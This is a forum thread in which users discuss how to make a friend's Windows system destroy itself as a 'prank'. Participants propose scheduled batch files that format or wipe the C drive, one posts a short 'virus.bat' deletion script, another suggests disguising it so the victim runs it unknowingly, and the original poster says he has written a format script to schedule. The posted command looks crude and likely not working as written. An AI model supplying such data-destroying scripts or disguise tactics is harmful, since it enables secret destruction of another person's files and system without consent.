arrow_upward

Pages (2):
Thread Rating:
  • 0 Vote(s) - 0 Average
Hello Friends,
                       I am searching for a virus or a method to prank a friend.I want that his OS automatically destroy after some time.Is there any way to do this? I am searching on google for this but unable to find anything.
Anything that can set schedule that automatically after 10 days his Partition C get formated or any thing else.I tried the task scheduler but i am unable to create a task to destroy OS.
I just want this for prank not to harm anybody.

I am waiting for reply.

Thanks to Post4VPS and Hostlease for their great services.  
this is silly at the least. Why don't you write a batch file or script file that will run and install a very light second os or command line os or say transfer system file (sys) to another partition and make it bootable, then reboot to it and delete the previous ?
Sincere Thanks to VirMach for my VPS9. Also many thanks to Shadow Hosting and cubedata for the experiences I had with their VPSs.
Hmm format partition 'C' great idea, Please give me the method if you get one. You can try this one Harmless "Fake My Computer" or any folder to prank your dumb friend.
https://www.youtube.com/watch?v=ZdV6wKo5o1A
Terminal
Best Regards,
Global Moderator of Post4VPS 

Is this actually really destroy and format your friend's C partition, or just a prank as you said?
I might go for @rudra opinion too, use a batch file, and make it run as a cronjob, once a day.
If it's 10 times ran already, then destroy it!
Thanks to Limitless Hosting and Post4VPS for providing me excellent VPS 13!
(05-24-2019, 11:59 AM)tiwil Wrote: Is this actually really destroy and format your friend's C partition, or just a prank as you said?
I might go for @rudra opinion too, use a batch file, and make it run as a cronjob, once a day.
If it's 10 times ran already, then destroy it!

Nothing is bad in destroying the OS.I have found a solution i shall try.I have created a batch file with commands to format C drive.I shall try scheduling it.
I am still waiting for more replies if there is any better idea.

Thanks to Post4VPS and Hostlease for their great services.  
(05-24-2019, 07:59 AM)Rehan Wrote: Hello Friends,
                       I am searching for a virus or a method to prank a friend.I want that his OS automatically destroy after some time.Is there any way to do this? I am searching on google for this but unable to find anything.
Anything that can set schedule that automatically after 10 days his Partition C get formated or any thing else.I tried the task scheduler but i am unable to create a task to destroy OS.
I just want this for prank not to harm anybody.

I am waiting for reply.

you can code a program that look like a legit error/warning message without any harmful code
for windows you can use visual basic / c# to make that such of software i used to create that kind of software before when i use vb.net . nowdays i rarely use it i mostly code php and html instead .

or you can use other people software . just search on google hopefully you found it but if you want to customize it like what you want coding it is much better option
Terminal
humanpuff69@FPAX:~$ Thanks To Shadow Hosting And Post4VPS for VPS 5
1. open NOTEPAD

2. Fill With This Code

@echo off
DEL C: -Y

3. Save As All Files And Name With virus.bat

4. Run   Smile

<!> Don't Forget to Backup All Fill your friend's PC before running this script or you can die being thrown by your friend
Terminal
Solo Developer
(05-24-2019, 02:41 PM)chanalku91 Wrote: 1. open NOTEPAD

2. Fill With This Code

@echo off
DEL C: -Y

3. Save As All Files And Name With virus.bat

4. Run   Smile

<!> Don't Forget to Backup All Fill your friend's PC before running this script or you can die being thrown by your friend

You need to hide that virus naming and purpose it so he can trigger my opening something else.
No one knows what the future holds, that's why its potential is infinite
oh. I just assumed that one could not remove system partition from windows running from that partition itself. If you can, then fine. But may be you should be careful about his personal files on C.
Sincere Thanks to VirMach for my VPS9. Also many thanks to Shadow Hosting and cubedata for the experiences I had with their VPSs.
(05-24-2019, 07:26 PM)Kururin Wrote: You need to hide that virus naming and purpose it so he can trigger my opening something else.

For me it's easy!
I don't need much time to do it enough with the black coffee tool
Terminal
Solo Developer
Pages (2):
lockThread Closed 

person_pin_circle Users browsing this thread: 1 Guest(s)
Sponsors: VirMach - Host4Fun - CubeData - Evolution-Host - HostDare - Hyper Expert - Shadow Hosting - Bladenode - Hostlease - RackNerd - ReadyDedis - Limitless Hosting